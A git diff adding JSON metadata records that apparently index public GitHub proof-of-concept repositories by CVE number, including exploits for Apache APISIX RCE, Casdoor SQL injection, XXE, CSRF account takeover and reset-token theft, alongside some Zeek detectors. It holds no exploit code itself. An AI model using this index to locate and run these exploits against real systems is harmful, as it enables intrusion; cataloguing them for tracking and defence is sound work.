8, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 467604662, + "name": "CVE-2022-24112", + "full_name": "Mah1ndra\/CVE-2022-24112", + "owner": { + "login": "Mah1ndra", + "id": 32550072, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32550072?v=4", + "html_url": "https:\/\/github.com\/Mah1ndra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mah1ndra\/CVE-2022-24112", + "description": "CVE-2022-24112: Apache APISIX Remote Code Execution Vulnerability", + "fork": false, + "created_at": "2022-03-08T17:08:52Z", + "updated_at": "2024-02-18T09:53:21Z", + "pushed_at": "2022-03-08T17:12:37Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 470510353, + "name": "Apache-APISIX-CVE-2022-24112", + "full_name": "M4xSec\/Apache-APISIX-CVE-2022-24112", + "owner": { + "login": "M4xSec", + "id": 57313495, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57313495?v=4", + "html_url": "https:\/\/github.com\/M4xSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M4xSec\/Apache-APISIX-CVE-2022-24112", + "description": "Apache APISIX Remote Code Execution (CVE-2022-24112) proof of concept exploit ", + "fork": false, + "created_at": "2022-03-16T09:19:12Z", + "updated_at": "2024-08-12T20:21:36Z", + "pushed_at": "2022-03-16T09:19:30Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 470905781, + "name": "CVE-2022-24112-POC", + "full_name": "kavishkagihan\/CVE-2022-24112-POC", + "owner": { + "login": "kavishkagihan", + "id": 85458014, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85458014?v=4", + "html_url": "https:\/\/github.com\/kavishkagihan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kavishkagihan\/CVE-2022-24112-POC", + "description": "Apache APISIX 2.12.1 Remote Code Execution by IP restriction bypass and using default admin AIP token", + "fork": false, + "created_at": "2022-03-17T08:22:54Z", + "updated_at": "2023-07-18T07:35:54Z", + "pushed_at": "2022-03-17T08:24:53Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 472038804, + "name": "cve-2022-24112", + "full_name": "twseptian\/cve-2022-24112", + "owner": { + "login": "twseptian", + "id": 9025301, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9025301?v=4", + "html_url": "https:\/\/github.com\/twseptian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/twseptian\/cve-2022-24112", + "description": "Apache APISIX < 2.12.1 Remote Code Execution and Docker Lab", + "fork": false, + "created_at": "2022-03-20T16:35:55Z", + "updated_at": "2023-11-18T07:54:06Z", + "pushed_at": "2022-03-20T18:09:34Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache-apisix", + "cve-2022-24112", + "proof-of-concept", + "remote-code-execution" + ], + "visibility": "public", + "forks": 11, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 573818685, + "name": "CVE-2022-24112_POC", + "full_name": "Acczdy\/CVE-2022-24112_POC", + "owner": { + "login": "Acczdy", + "id": 107027804, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107027804?v=4", + "html_url": "https:\/\/github.com\/Acczdy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Acczdy\/CVE-2022-24112_POC", + "description": "CVE-2022-24112_POC", + "fork": false, + "created_at": "2022-12-03T14:31:28Z", + "updated_at": "2023-11-01T00:54:12Z", + "pushed_at": "2022-12-04T03:12:17Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809913189, + "name": "exploit_CVE-2022-24112", + "full_name": "btar1gan\/exploit_CVE-2022-24112", + "owner": { + "login": "btar1gan", + "id": 92728059, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92728059?v=4", + "html_url": "https:\/\/github.com\/btar1gan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/btar1gan\/exploit_CVE-2022-24112", + "description": "New exploit for Apache APISIX v2.12.1 - Remote code execution (RCE)", + "fork": false, + "created_at": "2024-06-03T17:33:59Z", + "updated_at": "2024-09-15T17:20:39Z", + "pushed_at": "2024-06-07T05:09:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24122.json b/2022/CVE-2022-24122.json new file mode 100644 index 0000000000..8982e11c2d --- /dev/null +++ b/2022/CVE-2022-24122.json @@ -0,0 +1,38 @@ +[ + { + "id": 468398052, + "name": "CVE-2022-24122", + "full_name": "meowmeowxw\/CVE-2022-24122", + "owner": { + "login": "meowmeowxw", + "id": 43200867, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43200867?v=4", + "html_url": "https:\/\/github.com\/meowmeowxw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/meowmeowxw\/CVE-2022-24122", + "description": "CVE-2022-24122 Proof of Concept", + "fork": false, + "created_at": "2022-03-10T15:20:04Z", + "updated_at": "2022-08-15T15:42:12Z", + "pushed_at": "2022-03-15T11:18:45Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-24122", + "kernel", + "linux" + ], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24124.json b/2022/CVE-2022-24124.json new file mode 100644 index 0000000000..3f3ee53efd --- /dev/null +++ b/2022/CVE-2022-24124.json @@ -0,0 +1,105 @@ +[ + { + "id": 463446054, + "name": "CVE-2022-24124", + "full_name": "ColdFusionX\/CVE-2022-24124", + "owner": { + "login": "ColdFusionX", + "id": 8522240, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8522240?v=4", + "html_url": "https:\/\/github.com\/ColdFusionX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ColdFusionX\/CVE-2022-24124", + "description": "POC for CVE-2022-24124", + "fork": false, + "created_at": "2022-02-25T07:55:55Z", + "updated_at": "2024-11-16T19:52:55Z", + "pushed_at": "2022-03-01T09:44:29Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "casdoor", + "exploit", + "sqli", + "sqlinjection" + ], + "visibility": "public", + "forks": 4, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 499935826, + "name": "CVE-2022-24124", + "full_name": "0xAbbarhSF\/CVE-2022-24124", + "owner": { + "login": "0xAbbarhSF", + "id": 67552744, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67552744?v=4", + "html_url": "https:\/\/github.com\/0xAbbarhSF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xAbbarhSF\/CVE-2022-24124", + "description": "Dump SQL database version on host running Casdoor < 1.13.1", + "fork": false, + "created_at": "2022-06-04T21:01:22Z", + "updated_at": "2023-09-28T11:39:25Z", + "pushed_at": "2022-06-04T21:03:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 531165610, + "name": "CVE-2022-24124", + "full_name": "b1gdog\/CVE-2022-24124", + "owner": { + "login": "b1gdog", + "id": 81157360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81157360?v=4", + "html_url": "https:\/\/github.com\/b1gdog", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b1gdog\/CVE-2022-24124", + "description": "CVE-2022-24124 exploit", + "fork": false, + "created_at": "2022-08-31T16:23:16Z", + "updated_at": "2024-01-28T01:39:28Z", + "pushed_at": "2023-08-15T22:59:56Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "poc", + "python", + "sqli", + "sqlinjection" + ], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24125.json b/2022/CVE-2022-24125.json new file mode 100644 index 0000000000..d8253c2e7a --- /dev/null +++ b/2022/CVE-2022-24125.json @@ -0,0 +1,39 @@ +[ + { + "id": 453209843, + "name": "ds3-nrssr-rce", + "full_name": "tremwil\/ds3-nrssr-rce", + "owner": { + "login": "tremwil", + "id": 11468751, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11468751?v=4", + "html_url": "https:\/\/github.com\/tremwil", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tremwil\/ds3-nrssr-rce", + "description": "Documentation and proof of concept code for CVE-2022-24125 and CVE-2022-24126.", + "fork": false, + "created_at": "2022-01-28T20:37:14Z", + "updated_at": "2024-11-02T08:34:48Z", + "pushed_at": "2022-08-30T02:11:05Z", + "stargazers_count": 150, + "watchers_count": 150, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "darksouls3", + "exploit", + "rce", + "secuirty", + "souls-games" + ], + "visibility": "public", + "forks": 8, + "watchers": 150, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-2414.json b/2022/CVE-2022-2414.json new file mode 100644 index 0000000000..06f36c994a --- /dev/null +++ b/2022/CVE-2022-2414.json @@ -0,0 +1,126 @@ +[ + { + "id": 526356142, + "name": "CVE-2022-2414-POC", + "full_name": "superhac\/CVE-2022-2414-POC", + "owner": { + "login": "superhac", + "id": 7942984, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7942984?v=4", + "html_url": "https:\/\/github.com\/superhac", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/superhac\/CVE-2022-2414-POC", + "description": null, + "fork": false, + "created_at": "2022-08-18T19:58:53Z", + "updated_at": "2022-08-18T21:20:48Z", + "pushed_at": "2022-08-18T20:33:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 575000962, + "name": "CVE-2022-2414-Proof-Of-Concept", + "full_name": "amitlttwo\/CVE-2022-2414-Proof-Of-Concept", + "owner": { + "login": "amitlttwo", + "id": 55759090, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55759090?v=4", + "html_url": "https:\/\/github.com\/amitlttwo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amitlttwo\/CVE-2022-2414-Proof-Of-Concept", + "description": "A flaw was found in pki-core. Access to external entities when parsing XML documents can lead to XML external entity (XXE) attacks. This flaw allows a remote attacker to potentially retrieve the content of arbitrary files by sending specially crafted HTTP requests.", + "fork": false, + "created_at": "2022-12-06T14:37:08Z", + "updated_at": "2023-09-21T08:39:16Z", + "pushed_at": "2022-12-06T14:45:04Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 700743029, + "name": "CVE-2022-2414", + "full_name": "satyasai1460\/CVE-2022-2414", + "owner": { + "login": "satyasai1460", + "id": 68277833, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68277833?v=4", + "html_url": "https:\/\/github.com\/satyasai1460", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/satyasai1460\/CVE-2022-2414", + "description": "CVE-2022-2414 POC", + "fork": false, + "created_at": "2023-10-05T07:55:01Z", + "updated_at": "2023-10-05T08:22:24Z", + "pushed_at": "2023-10-05T08:24:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 869025784, + "name": "CVE-2022-2414", + "full_name": "geniuszlyy\/CVE-2022-2414", + "owner": { + "login": "geniuszlyy", + "id": 137893386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137893386?v=4", + "html_url": "https:\/\/github.com\/geniuszlyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geniuszlyy\/CVE-2022-2414", + "description": "is a PoC script for demonstrating an XML External Entity (XXE) vulnerability exploitation", + "fork": false, + "created_at": "2024-10-07T15:36:39Z", + "updated_at": "2024-10-21T08:15:06Z", + "pushed_at": "2024-10-07T15:37:27Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24181.json b/2022/CVE-2022-24181.json new file mode 100644 index 0000000000..051a11a329 --- /dev/null +++ b/2022/CVE-2022-24181.json @@ -0,0 +1,33 @@ +[ + { + "id": 472668953, + "name": "CVE-2022-24181", + "full_name": "cyberhawk000\/CVE-2022-24181", + "owner": { + "login": "cyberhawk000", + "id": 101915378, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101915378?v=4", + "html_url": "https:\/\/github.com\/cyberhawk000", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cyberhawk000\/CVE-2022-24181", + "description": "XSS via Host Header injection and Steal Password Reset Token of another user", + "fork": false, + "created_at": "2022-03-22T08:06:53Z", + "updated_at": "2024-10-01T09:58:11Z", + "pushed_at": "2024-10-01T09:58:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24227.json b/2022/CVE-2022-24227.json new file mode 100644 index 0000000000..e608f97791 --- /dev/null +++ b/2022/CVE-2022-24227.json @@ -0,0 +1,33 @@ +[ + { + "id": 718130267, + "name": "CVE-2022-24227-updated", + "full_name": "Cyber-Wo0dy\/CVE-2022-24227-updated", + "owner": { + "login": "Cyber-Wo0dy", + "id": 148460873, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148460873?v=4", + "html_url": "https:\/\/github.com\/Cyber-Wo0dy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cyber-Wo0dy\/CVE-2022-24227-updated", + "description": "CVE-2022-24227 [Updated]: BoltWire v8.00 vulnerable to \"Stored Cross-site Scripting (XSS)\"", + "fork": false, + "created_at": "2023-11-13T12:53:56Z", + "updated_at": "2023-11-13T12:56:26Z", + "pushed_at": "2023-11-13T12:54:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24342.json b/2022/CVE-2022-24342.json new file mode 100644 index 0000000000..6b049ad053 --- /dev/null +++ b/2022/CVE-2022-24342.json @@ -0,0 +1,41 @@ +[ + { + "id": 509870464, + "name": "CVE-2022-24342", + "full_name": "yuriisanin\/CVE-2022-24342", + "owner": { + "login": "yuriisanin", + "id": 11749007, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11749007?v=4", + "html_url": "https:\/\/github.com\/yuriisanin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yuriisanin\/CVE-2022-24342", + "description": "PoC for CVE-2022-24342: account takeover via CSRF in GitHub authentication", + "fork": false, + "created_at": "2022-07-02T22:04:29Z", + "updated_at": "2024-08-30T13:59:18Z", + "pushed_at": "2022-07-05T17:31:35Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "csrf", + "cve", + "cve-2022-24342", + "exploit", + "jetbrains", + "teamcity", + "vulnerability" + ], + "visibility": "public", + "forks": 7, + "watchers": 36, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24348.json b/2022/CVE-2022-24348.json new file mode 100644 index 0000000000..5df0180cd0 --- /dev/null +++ b/2022/CVE-2022-24348.json @@ -0,0 +1,33 @@ +[ + { + "id": 456161456, + "name": "CVE-2022-24348-2", + "full_name": "jkroepke\/CVE-2022-24348-2", + "owner": { + "login": "jkroepke", + "id": 1560587, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1560587?v=4", + "html_url": "https:\/\/github.com\/jkroepke", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jkroepke\/CVE-2022-24348-2", + "description": "Find similar issues like CVE-2022-24348", + "fork": false, + "created_at": "2022-02-06T13:39:57Z", + "updated_at": "2022-08-16T15:07:13Z", + "pushed_at": "2023-01-13T10:48:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24439.json b/2022/CVE-2022-24439.json new file mode 100644 index 0000000000..4d0aacf30e --- /dev/null +++ b/2022/CVE-2022-24439.json @@ -0,0 +1,33 @@ +[ + { + "id": 873393552, + "name": "CVE-2022-24439", + "full_name": "muhammadhendro\/CVE-2022-24439", + "owner": { + "login": "muhammadhendro", + "id": 40570379, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40570379?v=4", + "html_url": "https:\/\/github.com\/muhammadhendro", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/muhammadhendro\/CVE-2022-24439", + "description": null, + "fork": false, + "created_at": "2024-10-16T05:06:01Z", + "updated_at": "2024-10-16T05:07:07Z", + "pushed_at": "2024-10-16T05:07:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24442.json b/2022/CVE-2022-24442.json new file mode 100644 index 0000000000..a196b29937 --- /dev/null +++ b/2022/CVE-2022-24442.json @@ -0,0 +1,43 @@ +[ + { + "id": 739172589, + "name": "CVE-2022-24442", + "full_name": "mbadanoiu\/CVE-2022-24442", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2022-24442", + "description": "CVE-2022-24442: FreeMarker Server-Side Template Injection in JetBrains YouTrack", + "fork": false, + "created_at": "2024-01-05T00:04:41Z", + "updated_at": "2024-01-05T00:24:40Z", + "pushed_at": "2024-01-05T00:21:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "authenticated", + "bypass", + "cve", + "cve-2021-25770", + "cve-2022-24442", + "cves", + "remote-code-execution", + "server-side-template-injection" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24449.json b/2022/CVE-2022-24449.json new file mode 100644 index 0000000000..6fd5b35d11 --- /dev/null +++ b/2022/CVE-2022-24449.json @@ -0,0 +1,33 @@ +[ + { + "id": 486592621, + "name": "CVE-2022-24449", + "full_name": "jet-pentest\/CVE-2022-24449", + "owner": { + "login": "jet-pentest", + "id": 71512502, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71512502?v=4", + "html_url": "https:\/\/github.com\/jet-pentest", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jet-pentest\/CVE-2022-24449", + "description": "Solar Appscreener XXE", + "fork": false, + "created_at": "2022-04-28T12:51:01Z", + "updated_at": "2022-04-28T12:51:01Z", + "pushed_at": "2022-04-28T13:07:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24481.json b/2022/CVE-2022-24481.json new file mode 100644 index 0000000000..dfdc1f29c5 --- /dev/null +++ b/2022/CVE-2022-24481.json @@ -0,0 +1,33 @@ +[ + { + "id": 640468590, + "name": "CVE-2022-24481-POC", + "full_name": "fr4nkxixi\/CVE-2022-24481-POC", + "owner": { + "login": "fr4nkxixi", + "id": 81340681, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81340681?v=4", + "html_url": "https:\/\/github.com\/fr4nkxixi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fr4nkxixi\/CVE-2022-24481-POC", + "description": "POC for CLFS CVE-2022-24481", + "fork": false, + "created_at": "2023-05-14T07:30:23Z", + "updated_at": "2024-06-10T17:07:19Z", + "pushed_at": "2023-05-14T08:07:40Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24483.json b/2022/CVE-2022-24483.json new file mode 100644 index 0000000000..75dba002c1 --- /dev/null +++ b/2022/CVE-2022-24483.json @@ -0,0 +1,33 @@ +[ + { + "id": 480920879, + "name": "CVE-2022-24483", + "full_name": "waleedassar\/CVE-2022-24483", + "owner": { + "login": "waleedassar", + "id": 5983995, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5983995?v=4", + "html_url": "https:\/\/github.com\/waleedassar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/waleedassar\/CVE-2022-24483", + "description": "POC For CVE-2022-24483", + "fork": false, + "created_at": "2022-04-12T18:04:29Z", + "updated_at": "2024-05-13T04:14:02Z", + "pushed_at": "2022-04-12T18:06:57Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 14, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24491.json b/2022/CVE-2022-24491.json new file mode 100644 index 0000000000..215fb6994c --- /dev/null +++ b/2022/CVE-2022-24491.json @@ -0,0 +1,33 @@ +[ + { + "id": 481211337, + "name": "CVE-2022-24491", + "full_name": "corelight\/CVE-2022-24491", + "owner": { + "login": "corelight", + "id": 21672558, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21672558?v=4", + "html_url": "https:\/\/github.com\/corelight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/corelight\/CVE-2022-24491", + "description": "A Zeek CVE-2022-24491 detector.", + "fork": false, + "created_at": "2022-04-13T12:40:57Z", + "updated_at": "2022-12-14T08:58:43Z", + "pushed_at": "2023-03-27T15:20:04Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 8 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24494.json b/2022/CVE-2022-24494.json new file mode 100644 index 0000000000..579e2b59ce --- /dev/null +++ b/2022/CVE-2022-24494.json @@ -0,0 +1,33 @@ +[ + { + "id": 496944402, + "name": "AFD", + "full_name": "vportal\/AFD", + "owner": { + "login": "vportal", + "id": 36407322, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36407322?v=4", + "html_url": "https:\/\/github.com\/vportal", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vportal\/AFD", + "description": "CVE-2022-24494", + "fork": false, + "created_at": "2022-05-27T09:52:52Z", + "updated_at": "2024-06-20T10:53:09Z", + "pushed_at": "2022-05-27T10:48:45Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24497.json b/2022/CVE-2022-24497.json new file mode 100644 index 0000000000..17e1145f17 --- /dev/null +++ b/2022/CVE-2022-24497.json @@ -0,0 +1,33 @@ +[ + { + "id": 481306870, + "name": "CVE-2022-24497", + "full_name": "corelight\/CVE-2022-24497", + "owner": { + "login": "corelight", + "id": 21672558, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21672558?v=4", + "html_url": "https:\/\/github.com\/corelight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/corelight\/CVE-2022-24497", + "description": "A Zeek detector for CVE-2022-24497.", + "fork": false, + "created_at": "2022-04-13T17:12:59Z", + "updated_at": "2022-09-16T01:31:24Z", + "pushed_at": "2022-09-15T16:16:21Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 9 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24500.json b/2022/CVE-2022-24500.json new file mode 100644 index 0000000000..4a332e4fec --- /dev/null +++ b/2022/CVE-2022-24500.json @@ -0,0 +1,33 @@ +[ + { + "id": 674032505, + "name": "CVE-2022-24500", + "full_name": "0xZipp0\/CVE-2022-24500", + "owner": { + "login": "0xZipp0", + "id": 73413581, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73413581?v=4", + "html_url": "https:\/\/github.com\/0xZipp0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xZipp0\/CVE-2022-24500", + "description": null, + "fork": false, + "created_at": "2023-08-03T01:55:15Z", + "updated_at": "2023-09-21T09:36:18Z", + "pushed_at": "2023-08-03T01:55:23Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24611.json b/2022/CVE-2022-24611.json new file mode 100644 index 0000000000..4927e369b0 --- /dev/null +++ b/2022/CVE-2022-24611.json @@ -0,0 +1,33 @@ +[ + { + "id": 493230042, + "name": "CVE-2022-24611", + "full_name": "ITSecLab-HSEL\/CVE-2022-24611", + "owner": { + "login": "ITSecLab-HSEL", + "id": 103120243, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103120243?v=4", + "html_url": "https:\/\/github.com\/ITSecLab-HSEL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ITSecLab-HSEL\/CVE-2022-24611", + "description": "Details regarding the Z-Wave S0-No-More attack", + "fork": false, + "created_at": "2022-05-17T11:55:09Z", + "updated_at": "2022-05-18T01:31:46Z", + "pushed_at": "2022-05-17T12:24:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 